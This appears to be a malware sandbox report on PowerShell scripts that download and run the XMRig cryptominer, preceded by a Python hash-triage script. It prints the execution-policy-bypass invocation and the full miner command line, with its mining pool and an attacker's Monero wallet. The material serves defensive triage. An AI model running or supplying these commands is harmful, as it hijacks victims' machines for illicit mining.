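     "sha256": "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b",
     "sha512": "4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b3"
               "7b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a"},
    {"path": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "md5": "205ad9eb6acd6f58752899669b69fe74",
     "sha1": "bedb78ac5034259b86c2cbc915de2e861e8d7604",
     "sha256": "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda"},
    {"path": r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b0lia2ul.xtv.ps1",
     "md5": "d17fe0a3f47be24a6453e9ef58c94641",
     "sha1": "6ab83620379fc69f80c0242105ddffd7d98d5d9d",
     "sha256": "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7"},
]

# The dropped binary's SHA-256, copied from the report, is the indicator to pivot on.
KNOWN_SAMPLE_SHA256 = {
    "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda": "xmrig.exe dropped by this sample",
}

ALGOS = ("md5", "sha1", "sha256", "sha512")


def digests(data):
    """All four digests the report lists, for a byte string."""
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ALGOS}


# What powershell.exe writes to __PSScriptPolicyTest_*.ps1 when it probes
# AppLocker/WDAC script enforcement: the single byte "1".
POLICY_PROBE = digests(b"1")


def classify(entry):
    """Label one file entry from its name and digests."""
    name = entry["path"].rsplit("\\", 1)[-1]
    if entry["sha256"] in KNOWN_SAMPLE_SHA256:
        return "sample_artifact"
    if name.startswith("__PSScriptPolicyTest_") and name.endswith(".ps1"):
        # Every digest the entry carries must agree with the one-byte content;
        # a partial match would mean the report's hashes are inconsistent.
        present = [a for a in ALGOS if a in entry]
        if all(entry[a] == POLICY_PROBE[a] for a in present):
            return "powershell_policy_probe"
        return "policy_probe_name_unverified_content"
    return "unknown"


def triage_files(entries):
    return {e["path"].rsplit("\\", 1)[-1]: classify(e) for e in entries}


if __name__ == "__main__":
    for name, label in triage_files(FILES).items():
        print(label, name)
```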

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:04

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1786s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

memory/3968-0-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3968-5-0x000002727BFE0000-0x000002727C002000-memory.dmp

memory/3968-9-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3968-8-0x000002727C1B0000-0x000002727C226000-memory.dmp

memory/3968-18-0x00007FF992770000-0x00007FF99315C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_isgkynml.vzf.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3968-25-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3968-48-0x000002727C070000-0x000002727C082000-memory.dmp

memory/3968-61-0x000002727C060000-0x000002727C06A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2576-90-0x00000270465D0000-0x00000270465F0000-memory.dmp

memory/3968-91-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3968-92-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/2576-93-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/3968-94-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/2576-95-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-96-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-97-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-98-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-99-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-100-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-101-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-102-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-103-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-104-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-105-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-106-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-107-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-108-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-109-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-110-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-111-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-112-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-113-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-114-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-115-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-116-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-117-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-118-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-119-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-120-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-121-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-122-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-123-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-124-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-125-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-126-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-127-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-128-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-129-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-130-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-131-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-132-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-133-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-134-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-135-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-136-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-137-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-138-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-139-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-140-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-141-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-142-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-143-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-144-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-145-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-146-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-147-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-148-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-149-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-150-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-151-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-152-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-153-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-154-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-155-0x00007FF617300000-0x00007FF617F33000-memory.dmp

memory/2576-156-0x00007FF617300000-0x00007FF617F33000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:06

Platform

win10v2004-20240426-en

Max time kernel

1798s

Max time network

1793s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp

Files

memory/1404-0-0x00007FFB9D473000-0x00007FFB9D475000-memory.dmp

memory/1404-6-0x0000026CF8B10000-0x0000026CF8B32000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b0lia2ul.xtv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1404-11-0x00007FFB9D470000-0x00007FFB9DF31000-memory.dmp

memory/1404-12-0x00007FFB9D470000-0x00007FFB9DF31000-memory.dmp

memory/1404-14-0x00007FFB9D470000-0x00007FFB9DF31000-memory.dmp

memory/1404-15-0x0000026CF8DC0000-0x0000026CF8DD2000-memory.dmp

memory/1404-16-0x0000026CDFC20000-0x0000026CDFC2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4708-47-0x000002478F980000-0x000002478F9A0000-memory.dmp

memory/4708-48-0x000002478F9C0000-0x000002478F9E0000-memory.dmp

memory/4708-49-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-50-0x000002478F9E0000-0x000002478FA00000-memory.dmp

memory/4708-53-0x000002478FA00000-0x000002478FA20000-memory.dmp

memory/1404-52-0x00007FFB9D473000-0x00007FFB9D475000-memory.dmp

memory/4708-51-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/1404-54-0x00007FFB9D470000-0x00007FFB9DF31000-memory.dmp

memory/1404-55-0x00007FFB9D470000-0x00007FFB9DF31000-memory.dmp

memory/4708-56-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-58-0x000002478F9E0000-0x000002478FA00000-memory.dmp

memory/4708-57-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-59-0x000002478FA00000-0x000002478FA20000-memory.dmp

memory/4708-60-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-61-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-62-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-63-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-64-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-65-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-66-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-67-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-68-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-69-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-70-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-71-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-72-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-73-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-74-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-75-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-76-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-77-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-78-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-79-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-80-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-81-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-82-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-83-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-84-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-85-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-86-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-87-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-88-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-89-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-90-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-91-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-92-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-93-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-94-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-95-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-96-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-97-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-98-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-99-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-100-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-101-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-102-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-103-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-104-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-105-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-106-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-107-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-108-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-109-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-110-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-111-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-112-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-113-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-114-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-115-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-116-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-117-0x00007FF651260000-0x00007FF651E93000-memory.dmp

memory/4708-118-0x00007FF651260000-0x00007FF651E93000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:26

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1787s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 52.111.229.43:443 tcp
US 8.8.8.8:53 169.117.168.52.in-addr.arpa udp

Files

memory/2540-0-0x00007FFB74CF3000-0x00007FFB74CF5000-memory.dmp

memory/2540-6-0x0000028930AA0000-0x0000028930AC2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_03ooksts.msu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2540-11-0x00007FFB74CF0000-0x00007FFB757B1000-memory.dmp

memory/2540-12-0x00007FFB74CF0000-0x00007FFB757B1000-memory.dmp

memory/2540-14-0x00007FFB74CF0000-0x00007FFB757B1000-memory.dmp

memory/2540-15-0x0000028931640000-0x0000028931652000-memory.dmp

memory/2540-16-0x0000028930B10000-0x0000028930B1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:35

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1774s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
SE 184.31.15.184:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 184.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
SE 184.31.15.184:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
